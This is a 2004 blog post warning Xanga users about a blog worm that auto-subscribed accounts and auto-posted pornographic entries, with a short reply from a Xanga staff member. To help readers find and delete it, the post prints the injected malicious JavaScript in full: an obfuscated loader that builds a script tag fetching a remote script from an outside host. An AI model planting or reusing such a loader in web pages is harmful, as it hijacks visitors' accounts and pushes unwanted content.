April 16, 2004

  • What's happening:  Xanga's been pervasively hacked by a malicious script.  Your site may be compromised (mine was). 

    Symptoms: You get autosubbed to some sick sites, you get autosubbed to a gay/lesbian blogring, and your blog gets an additional pornographic auto-post right after you genuinely post something of your own.


    What you can do: Check your 'Website Statistics' section under your 'Look and Feel' selection and delete the following malicious code, if it exists:


    <script>
    var mys = "http://almostjdi.9p.org.uk/minijdi.js";
    var l0 = "<b>".substr(0,1);
    var l1 = "sc";
    var l2 = "ip";
    document.write(""+l0+l1+""+"r"+l2+"t "+l1.substr(0,1)+"rc='"+mys+"'>"+l0+"/"+l1+"r"+l2+"t>");
    </script><script>var dontpostagain=true</script>


    And, not a bad idea: Change your password in case the script had some method of stealing it (though now looking at it, I doubt it.)


    Explanation: The site mentioned above is a free subdomain that was established on a free webhosting site in the UK.  You can get your own here (if you wanted to): http://www.portland.co.uk/freesubdomainapp.esp


    Apparently, that web host allows javascripts of any type to get posted by anonymous members.  And the script bastard put one there and then inserted javascript code in Xanga that called it up to sub and post on your behalf.  Now, how did it penetrate into Xanga itself?  Good fucking question.  But it looks like Xanga has already taken action itself since a couple of the sites that this script was referring to, Sex_Addiction and almostjdi , are already shut down.


    post-note:  Oh, and here's a response from John on the situation (I wrote him earlier):


    Hey Steve, yah someone was trying to get a blogworm going. I'll post more
    about this in a bit... a bit busy over here quashing it (it should be
    disabled for now).


Comments (359)

Comments are closed.

Post a Comment

Recent Posts

Categories

The End of Days

April 2004
M T W T F S S
« Mar   May »
 1234
567891011
12131415161718
19202122232425
2627282930